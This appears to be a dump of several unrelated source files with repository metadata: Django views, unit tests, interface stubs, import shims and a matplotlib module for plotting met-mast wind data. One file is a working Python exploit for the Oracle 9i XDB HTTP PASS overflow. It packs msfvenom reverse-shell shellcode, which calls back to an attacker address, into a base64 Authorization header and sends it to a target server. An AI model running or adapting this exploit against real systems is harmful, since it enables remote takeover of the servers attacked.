6e49ee8b2ffb6d19dcfd9cbe8b3397416c9b5ded
|
[
"BSD-3-Clause"
] | 2
|
2022-03-01T00:38:09.000Z
|
2022-03-21T09:38:49.000Z
|
def setup_handlers(web_app):
pass
| 12.666667
| 28
| 0.736842
| 6
| 38
| 4.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184211
| 38
| 2
| 29
| 19
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
321697c6f2f28cd4f7723eac460ab47d6a5d0e33
| 287
|
py
|
Python
|
channel/views.py
|
VisheshPandita/django-channels
|
9ce12c23a3c575bfdcabfb2e9ddb785a13b73c38
|
[
"MIT"
] | null | null | null |
channel/views.py
|
VisheshPandita/django-channels
|
9ce12c23a3c575bfdcabfb2e9ddb785a13b73c38
|
[
"MIT"
] | null | null | null |
channel/views.py
|
VisheshPandita/django-channels
|
9ce12c23a3c575bfdcabfb2e9ddb785a13b73c38
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
def index(request):
return render(request, 'channel/index.html')
def room(request, room_name):
return render(request, 'channel/room.html', {
'room_name': room_name
})
| 23.916667
| 49
| 0.71777
| 38
| 287
| 5.342105
| 0.447368
| 0.118227
| 0.187192
| 0.246305
| 0.305419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174216
| 287
| 12
| 50
| 23.916667
| 0.85654
| 0.080139
| 0
| 0.25
| 0
| 0
| 0.1673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
5c54417937c7899fd8c6983a5daae59d1bdff333
| 636
|
py
|
Python
|
tests/kyu_7_tests/test_a_rule_of_divisibility_by_13.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
tests/kyu_7_tests/test_a_rule_of_divisibility_by_13.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
tests/kyu_7_tests/test_a_rule_of_divisibility_by_13.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
import unittest
from katas.kyu_7.a_rule_of_divisibility_by_13 import thirt
class ThirtTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(thirt(1234567), 87)
def test_equals_2(self):
self.assertEqual(thirt(321), 48)
def test_equals_3(self):
self.assertEqual(thirt(8529), 79)
def test_equals_4(self):
self.assertEqual(thirt(85299258), 31)
def test_equals_5(self):
self.assertEqual(thirt(5634), 57)
def test_equals_6(self):
self.assertEqual(thirt(1111111111), 71)
def test_equals_7(self):
self.assertEqual(thirt(987654321), 30)
| 23.555556
| 58
| 0.688679
| 87
| 636
| 4.816092
| 0.45977
| 0.116945
| 0.217184
| 0.400955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134122
| 0.20283
| 636
| 26
| 59
| 24.461538
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.411765
| 1
| 0.411765
| false
| 0
| 0.117647
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
5c6c062454eb5aef00acec053742e41f9cdc9ea2
| 31
|
py
|
Python
|
python/gto/gto.py
|
marza-animation-planet/gto
|
4f6e6dce73b1da6f6618c8e8f9bb5f84357f08df
|
[
"BSD-3-Clause"
] | null | null | null |
python/gto/gto.py
|
marza-animation-planet/gto
|
4f6e6dce73b1da6f6618c8e8f9bb5f84357f08df
|
[
"BSD-3-Clause"
] | null | null | null |
python/gto/gto.py
|
marza-animation-planet/gto
|
4f6e6dce73b1da6f6618c8e8f9bb5f84357f08df
|
[
"BSD-3-Clause"
] | 1
|
2019-04-04T00:05:35.000Z
|
2019-04-04T00:05:35.000Z
|
import _gto
from _gto import *
| 10.333333
| 18
| 0.774194
| 5
| 31
| 4.4
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.193548
| 31
| 2
| 19
| 15.5
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
5c6db08932438f83de80e9f0c5bb4103c494815e
| 535
|
py
|
Python
|
axonal/interface.py
|
HarryR/axonal
|
cf1b8536f45a7e4f9c7c42c18a088070baf81bac
|
[
"BSD-3-Clause"
] | 1
|
2019-09-08T04:17:16.000Z
|
2019-09-08T04:17:16.000Z
|
axonal/interface.py
|
HarryR/axonal
|
cf1b8536f45a7e4f9c7c42c18a088070baf81bac
|
[
"BSD-3-Clause"
] | null | null | null |
axonal/interface.py
|
HarryR/axonal
|
cf1b8536f45a7e4f9c7c42c18a088070baf81bac
|
[
"BSD-3-Clause"
] | null | null | null |
class Dispatcher:
def can_dispatch(self, request):
raise NotImplementedError()
def dispatch(self, request):
raise NotImplementedError()
class Transport:
def can_transport(self, request):
pass
def send_request(self, context, data):
raise NotImplementedError()
def send_event(self, context, data):
raise NotImplementedError()
class Protocol:
def encode(self, obj):
raise NotImplementedError()
def decode(self, data):
raise NotImplementedError()
| 20.576923
| 42
| 0.665421
| 53
| 535
| 6.641509
| 0.358491
| 0.409091
| 0.230114
| 0.136364
| 0.465909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.250467
| 535
| 25
| 43
| 21.4
| 0.877805
| 0
| 0
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.411765
| false
| 0.058824
| 0
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
5cd2541c505933bd016379e8eb3e8622c2aa157b
| 2,677
|
py
|
Python
|
oracle9i_xdb_http_pass.py
|
timip/explo
|
0697a34f100f4cf543c73e7d190254724ced543a
|
[
"Apache-2.0"
] | 41
|
2018-05-21T02:56:01.000Z
|
2022-03-22T03:57:33.000Z
|
oracle9i_xdb_http_pass.py
|
timip/explo
|
0697a34f100f4cf543c73e7d190254724ced543a
|
[
"Apache-2.0"
] | null | null | null |
oracle9i_xdb_http_pass.py
|
timip/explo
|
0697a34f100f4cf543c73e7d190254724ced543a
|
[
"Apache-2.0"
] | 22
|
2019-01-29T18:42:03.000Z
|
2021-11-02T21:11:13.000Z
|
# Exploit for Oracle 9i XDB HTTP PASS Overflow (win32)
# Based on https://www.exploit-db.com/exploits/16809/
# By TIMLAB timip.net
# Use in the form "python oracle9i_xdb_http_pass.py <Target IP Address> <Target Port No.>"
# Target Port No. = 8080
import sys, socket, base64
# Please replace it with your shellcode!!!!!!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.134 LPORT=4445 -b '\x00' -f python
buf = ""
buf += "\xd9\xc4\xbb\x69\x6e\xb8\x34\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x34\x7d\x5a"
buf += "\xc1\x3a\x69\x18\x2a\xc2\x6a\x7d\xa2\x27\x5b\xbd\xd0"
buf += "\x2c\xcc\x0d\x92\x60\xe1\xe6\xf6\x90\x72\x8a\xde\x97"
buf += "\x33\x21\x39\x96\xc4\x1a\x79\xb9\x46\x61\xae\x19\x76"
buf += "\xaa\xa3\x58\xbf\xd7\x4e\x08\x68\x93\xfd\xbc\x1d\xe9"
buf += "\x3d\x37\x6d\xff\x45\xa4\x26\xfe\x64\x7b\x3c\x59\xa7"
buf += "\x7a\x91\xd1\xee\x64\xf6\xdc\xb9\x1f\xcc\xab\x3b\xc9"
buf += "\x1c\x53\x97\x34\x91\xa6\xe9\x71\x16\x59\x9c\x8b\x64"
buf += "\xe4\xa7\x48\x16\x32\x2d\x4a\xb0\xb1\x95\xb6\x40\x15"
buf += "\x43\x3d\x4e\xd2\x07\x19\x53\xe5\xc4\x12\x6f\x6e\xeb"
buf += "\xf4\xf9\x34\xc8\xd0\xa2\xef\x71\x41\x0f\x41\x8d\x91"
buf += "\xf0\x3e\x2b\xda\x1d\x2a\x46\x81\x49\x9f\x6b\x39\x8a"
buf += "\xb7\xfc\x4a\xb8\x18\x57\xc4\xf0\xd1\x71\x13\xf6\xcb"
buf += "\xc6\x8b\x09\xf4\x36\x82\xcd\xa0\x66\xbc\xe4\xc8\xec"
buf += "\x3c\x08\x1d\xa2\x6c\xa6\xce\x03\xdc\x06\xbf\xeb\x36"
buf += "\x89\xe0\x0c\x39\x43\x89\xa7\xc0\x04\xbc\x3c\xca\x52"
buf += "\xa8\x40\xca\x4b\x74\xcc\x2c\x01\x96\x98\xe7\xbe\x0f"
buf += "\x81\x73\x5e\xcf\x1f\xfe\x60\x5b\xac\xff\x2f\xac\xd9"
buf += "\x13\xc7\x5c\x94\x49\x4e\x62\x02\xe5\x0c\xf1\xc9\xf5"
buf += "\x5b\xea\x45\xa2\x0c\xdc\x9f\x26\xa1\x47\x36\x54\x38"
buf += "\x11\x71\xdc\xe7\xe2\x7c\xdd\x6a\x5e\x5b\xcd\xb2\x5f"
buf += "\xe7\xb9\x6a\x36\xb1\x17\xcd\xe0\x73\xc1\x87\x5f\xda"
buf += "\x85\x5e\xac\xdd\xd3\x5e\xf9\xab\x3b\xee\x54\xea\x44"
buf += "\xdf\x30\xfa\x3d\x3d\xa1\x05\x94\x85\xd1\x4f\xb4\xac"
buf += "\x79\x16\x2d\xed\xe7\xa9\x98\x32\x1e\x2a\x28\xcb\xe5"
buf += "\x32\x59\xce\xa2\xf4\xb2\xa2\xbb\x90\xb4\x11\xbb\xb0"
host = sys.argv[1]
port = sys.argv[2]
ret = "\x46\x6d\x61\x60"
prependEncoder = "\x81\xc4\xff\xef\xff\xff\x44"
prep = "\x41" * 4 + ":" + "\x41" * 442
prep += "\xeb\x64" + "\x90" * 2 + ret
prep += "\x90" * 266 + "\xeb\x10" + "\x90" * 109 + prependEncoder + buf
prep = base64.b64encode(prep)
exploit = "GET / HTTP/1.1\x0d\x0a" + "Host: " + host + ":" + port + "\x0d\x0aAuthorization: Basic " + prep + "\x0d\x0a\x0d\x0a"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, int(port)))
client.sendall(exploit)
client.close()
print 'Done! Try harder!'
| 46.155172
| 127
| 0.672768
| 534
| 2,677
| 3.359551
| 0.531835
| 0.010033
| 0.012263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204341
| 0.087785
| 2,677
| 57
| 128
| 46.964912
| 0.530303
| 0.137094
| 0
| 0
| 0
| 0.627907
| 0.684622
| 0.631625
| 0.093023
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.023256
| null | null | 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7a710b950ddeeebd97825f0812b4bab3c0de0ad0
| 73
|
py
|
Python
|
PygameFloatObjects/__init__.py
|
MrComboF10/PygameFloatObjects
|
e139a3b542d1ef2d54604e2769827c9da6d2cee3
|
[
"MIT"
] | null | null | null |
PygameFloatObjects/__init__.py
|
MrComboF10/PygameFloatObjects
|
e139a3b542d1ef2d54604e2769827c9da6d2cee3
|
[
"MIT"
] | null | null | null |
PygameFloatObjects/__init__.py
|
MrComboF10/PygameFloatObjects
|
e139a3b542d1ef2d54604e2769827c9da6d2cee3
|
[
"MIT"
] | null | null | null |
from PygameFloatObjects.objects import FloatRect, FloatCircle, FloatFont
| 36.5
| 72
| 0.876712
| 7
| 73
| 9.142857
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082192
| 73
| 1
| 73
| 73
| 0.955224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
7a919abb635d3c7301e3044651ab38c78339674e
| 55
|
py
|
Python
|
xonsh/ptk2/shell.py
|
ion201/xonsh
|
7cf0307a0d53d198b8c05c83456d86af14c0daa4
|
[
"BSD-2-Clause-FreeBSD"
] | 4,716
|
2016-06-07T05:48:42.000Z
|
2022-03-31T22:30:15.000Z
|
xonsh/ptk2/shell.py
|
ion201/xonsh
|
7cf0307a0d53d198b8c05c83456d86af14c0daa4
|
[
"BSD-2-Clause-FreeBSD"
] | 3,644
|
2016-06-07T05:55:42.000Z
|
2022-03-31T13:25:57.000Z
|
xonsh/ptk2/shell.py
|
ion201/xonsh
|
7cf0307a0d53d198b8c05c83456d86af14c0daa4
|
[
"BSD-2-Clause-FreeBSD"
] | 576
|
2016-06-07T06:28:32.000Z
|
2022-03-31T02:46:15.000Z
|
from xonsh.ptk_shell.shell import * # noqa: F403 F401
| 27.5
| 54
| 0.745455
| 9
| 55
| 4.444444
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 0.163636
| 55
| 1
| 55
| 55
| 0.73913
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
7a933aba157e656a7ee1ee0874eb4ff73d1e70ec
| 87
|
py
|
Python
|
dragon/passes/__init__.py
|
Totillity/Dragon
|
3c7b57635b2631ef312bac05599b0a9e821716cb
|
[
"MIT"
] | 2
|
2019-08-14T19:11:40.000Z
|
2021-04-15T09:57:35.000Z
|
dragon/passes/__init__.py
|
Totillity/Dragon
|
3c7b57635b2631ef312bac05599b0a9e821716cb
|
[
"MIT"
] | null | null | null |
dragon/passes/__init__.py
|
Totillity/Dragon
|
3c7b57635b2631ef312bac05599b0a9e821716cb
|
[
"MIT"
] | null | null | null |
from .parser import parse
from .compiler import compile_drgn
from .scanner import scan
| 21.75
| 34
| 0.827586
| 13
| 87
| 5.461538
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 87
| 3
| 35
| 29
| 0.946667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8f9489601bb7707826675e276fbf1cdfccc5a057
| 40,692
|
py
|
Python
|
plotly/vis.py
|
NREL/MetMastVis
|
0c3dd87540471c061eb491c871fdb32e6dabd31b
|
[
"Apache-2.0"
] | 1
|
2018-05-25T20:03:48.000Z
|
2018-05-25T20:03:48.000Z
|
plotly/vis.py
|
nhamilto/MetMast
|
38475682adb21081c86c58e9008a278971306c23
|
[
"Apache-2.0"
] | null | null | null |
plotly/vis.py
|
nhamilto/MetMast
|
38475682adb21081c86c58e9008a278971306c23
|
[
"Apache-2.0"
] | 2
|
2018-06-07T20:00:03.000Z
|
2020-11-26T21:52:04.000Z
|
"""
:module: vis
:platform: Unix, Windows
:synopsis: This code is used as a visualization library for the Met Mast data so it is specifically designed to handle MetDat object from the "met_funcs.py" library.
:moduleauthor: Nicholas Hamilton <Nicholas.Hamilton@nrel.gov> Rafael Mudafort <Rafael.Mudafort@nrel.gov> Lucas McCullum <Lucas.McCullum@nrel.gov>
"""
###########################################
# Visualization
###########################################
import utils
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import numpy as np
from colour import Color
from windrose import WindroseAxes
import pandas as pd
plt.rc('font', family='serif')
plt.rc('font', size=12)
plt.rc('facecolor')
def cumulative_profile(metdat, catinfo, category=None):
"""**Get Variable Profile**.
Plot the vertical profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string): Specifies the category of information that is desired for plotting.
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
# extract vertical locations of data from variable names
colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])
plotdat = metdat[colnames].mean()
fig, ax = plt.subplots(figsize=(3.5,5))
ax.plot(plotdat, vertlocs)
ax.set_ylabel('Probe Height [m]')
ax.set_xlabel(catinfo['labels'][category])
fig.tight_layout()
return fig, ax
def monthly_profile(metdat, catinfo, category=None, basecolor='cycle'):
"""**Get Monthly Profile**.
Plot the monthly profile of a given variable (or category of variables) grouped by a given condition (or set of conditions).
Parameters:
1. metdat (Pandas DataFrame): The desired input data (Met Mast).
2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
4. basecolor (string) [default: 'cycle']: Provides the color code information to get from "utils.py".
Returns:
1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
"""
if category is None:
print('not sure what to plot...')
pass
months = utils.monthnames()
colors = utils.get_colors(len(months), basecolor=basecolor)
colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])
plotdat = metdat[colnames].groupby(metdat.index.month).mean()
fig, ax = plt.subplots(figsize=(3.5,5), sharex=True, sharey=True)
for iax in range(len(months)):
ax.plot(plotdat.xs(iax+1), vertlocs, color=colors[iax])
leg = ax.legend(months, loc=7, bbox_to_anchor=(1.75, 0.5), edgecolor='w')
ax.set_ylabel('Probe Height [m]')
ax.set_xlabel(catinfo['labels'][category])
fig.tight_layout()
return fig, ax
def stability_profile(metdat, catinfo, category=None, vertloc=80, basecolor='cycle'):
    """**Get Stability Profile**.

    Plot vertical profiles of a given category of variables, averaged within
    each atmospheric stability class (flagged at the given height).

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. basecolor (string) [default: 'cycle']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.

    Raises:
        ValueError: If no category is provided.
    """
    if category is None:
        # Fail fast; the original print-and-continue fell through to a KeyError.
        raise ValueError('not sure what to plot... please specify a category')

    stab, stabloc, ind = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
    colors = utils.get_colors(5, basecolor=basecolor)
    stabconds = utils.get_stabconds()

    plotdat = metdat.groupby(stab).mean()
    # BUG FIX: DataFrame.get_values() was deprecated in pandas 0.25 and removed
    # in 1.0; to_numpy() is the supported equivalent.
    pdat = plotdat[catinfo['columns'][category]].to_numpy()

    # Extract vertical locations of data from variable names
    _, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])

    fig, ax = plt.subplots(figsize=(3.5, 5))
    for ii, cond in enumerate(stabconds):
        ax.plot(pdat[ii, ind], vertlocs, color=colors[ii])

    ax.set_ylabel('Probe Height [m]')
    ax.set_xlabel(catinfo['labels'][category])
    fig.legend(stabconds, loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
    fig.tight_layout()

    return fig, ax
def monthly_stability_profiles(metdat, catinfo, category=None, vertloc=80, basecolor='span'):
    """**Get Monthly Stability Profile**.

    Plot a 4x3 grid (one subplot per month) of vertical profiles, averaged
    within each atmospheric stability class.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.

    Raises:
        ValueError: If no category is provided.
    """
    if category is None:
        # Fail fast; the original print-and-continue fell through to a KeyError.
        raise ValueError('not sure what to plot... please specify a category')

    stab, stabloc, ind = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
    plotdat = metdat.groupby([metdat.index.month, stab])

    # BUG FIX: honor the basecolor argument (was hard-coded to 'span').
    colors = utils.get_colors(5, basecolor=basecolor)
    months = utils.monthnames()
    stabconds = utils.get_stabconds()

    # extract vertical locations of data from variable names
    _, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category])

    fig, ax = plt.subplots(4, 3, figsize=(8, 13), sharex=True, sharey=True)
    for iax, month in enumerate(months):
        for ii, cond in enumerate(stabconds):
            pdat = plotdat[catinfo['columns'][category]].get_group((iax + 1, cond)).mean()
            ax.flatten()[iax].plot(pdat[ind], vertlocs, color=colors[ii])
        ax.flatten()[iax].set_title(month)

    fig.text(0, 0.58, 'Probe Height [m]', ha='center', va='center', fontsize=14, rotation='vertical')
    leg = fig.legend(stabconds, loc=9, bbox_to_anchor=(0.55, 0.12), frameon=False)
    fig.tight_layout()
    fig.subplots_adjust(bottom=0.175)
    fig.text(0.525, 0.135, catinfo['labels'][category], ha='center', va='center', fontsize=14)

    return fig, ax
def hourlyplot(metdat, catinfo, category=None, basecolor='span'):
    """**Get Hourly Averaged Profile**.

    Plot the hourly (time-of-day) average of each column in a category,
    one line per measurement height.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
        4. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.

    Raises:
        ValueError: If no category is provided.
    """
    if category is None:
        # Fail fast; the original print-and-continue fell through to a KeyError.
        raise ValueError('not sure what to plot... please specify a category')

    colors = utils.get_colors(len(catinfo['columns'][category]), basecolor=basecolor, reverse=True)
    colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category], reverse=True)

    # hourly mean of each measurement column (group index is hour 0-23)
    plotdat = metdat[colnames].groupby(metdat.index.hour).mean()

    # single axes: sharex/sharey kwargs from the original were no-ops here
    fig, ax = plt.subplots(figsize=(5, 3.5))
    for icol, col in enumerate(colnames):
        ax.plot(plotdat[col], color=colors[icol])

    leg = ax.legend([str(v) + ' m' for v in vertlocs], loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
    ax.set_xlabel('Time [hour]')
    ax.set_ylabel(catinfo['labels'][category])
    fig.tight_layout()

    return fig, ax
def monthlyhourlyplot(metdat, catinfo, category=None, basecolor='span'):
    """**Get Monthly Hourly Averaged Profile**.

    Plot a 4x3 grid (one subplot per month) of hourly averages of each column
    in a category, one line per measurement height.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
        4. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.

    Raises:
        ValueError: If no category is provided.
    """
    if category is None:
        # Fail fast; the original print-and-continue fell through to a KeyError.
        raise ValueError('not sure what to plot... please specify a category')

    months = utils.monthnames()
    colors = utils.get_colors(len(catinfo['columns'][category]), basecolor=basecolor, reverse=True)
    colnames, vertlocs, ind = utils.get_vertical_locations(catinfo['columns'][category], reverse=True)

    # two-level group: (month 1-12, hour 0-23)
    plotdat = metdat[colnames].groupby([metdat.index.month.rename('month'),
                                        metdat.index.hour.rename('hour')]).mean()

    fig, ax = plt.subplots(4, 3, figsize=(9, 11), sharex=True, sharey=True)
    for iax in range(len(months)):
        axi = ax.flatten()[iax]
        for catitem in range(len(colnames)):
            # xs selects the hourly series for this month
            axi.plot(plotdat[colnames[catitem]].xs(iax + 1), color=colors[catitem])
        axi.set_title(months[iax], fontsize=12)

    fig.text(0.5, 0.2, 'Time of Day [hour]', ha='center', va='center')
    leg = fig.legend([str(v) + ' m' for v in vertlocs], loc='upper center',
                     bbox_to_anchor=(0, -0.825, 1, 1), bbox_transform=plt.gcf().transFigure,
                     frameon=False, ncol=2)
    fig.tight_layout()
    fig.subplots_adjust(bottom=0.25)
    fig.text(0, 0.6125, catinfo['labels'][category], ha='center', va='center', rotation='vertical')

    return fig, ax
def rose_fig(metdat, catinfo, category=None, vertloc=80, bins=6, nsector=36, ylim=None, noleg=False):
    """**Get Wind Rose Figure**.

    Plot a wind rose of a given category of variables at the given height.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. bins (integer, list) [default: 6]: Number of equally spaced bins, or explicit bin edges, for the variable.
        6. nsector (integer) [default: 36]: Number of direction sectors in the rose.
        7. ylim (float) [default: None]: Maximum frequency value; lets multiple roses share uniform limits.
        8. noleg (Boolean) [default: False]: If True, suppress the legend.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
        3. leg (Matplotlib Legend): The legend object (the placeholder list ['blank'] when noleg is True).
    """
    # resolve column names at the requested measurement height
    dircol, _, _ = utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    winddir = metdat[dircol]
    var = metdat[varcol]

    # number of variable bins, whether `bins` is a count or explicit edges
    nbins = bins if isinstance(bins, int) else len(bins)

    # palette: span colors plus a dark terminal color, truncated to nbins
    palette = utils.get_colors(nbins - 1, basecolor='span')
    palette.append('#3A4246')
    palette = tuple(palette[:nbins])

    fig = plt.figure()
    ax = WindroseAxes.from_ax(fig=fig)
    ax.bar(winddir, var, normed=True, opening=0.95, edgecolor='white',
           bins=bins, nsector=nsector, colors=palette, linewidth=0.35)

    # legend (placeholder value returned when suppressed)
    leg = ['blank']
    if noleg is not True:
        leg = ax.set_legend(loc=7, bbox_to_anchor=(1.55, 0.5), fontsize=10, frameon=False)
        leg.set_title(catinfo['labels'][category])
        fig.text(0.875, 0.275, r'$z={}$ m'.format(vertloc))

    # default the frequency limit to whatever the rose produced
    if ylim is None:
        ylim = ax.get_ylim()[-1]

    ax.set_ylim(0, ylim)
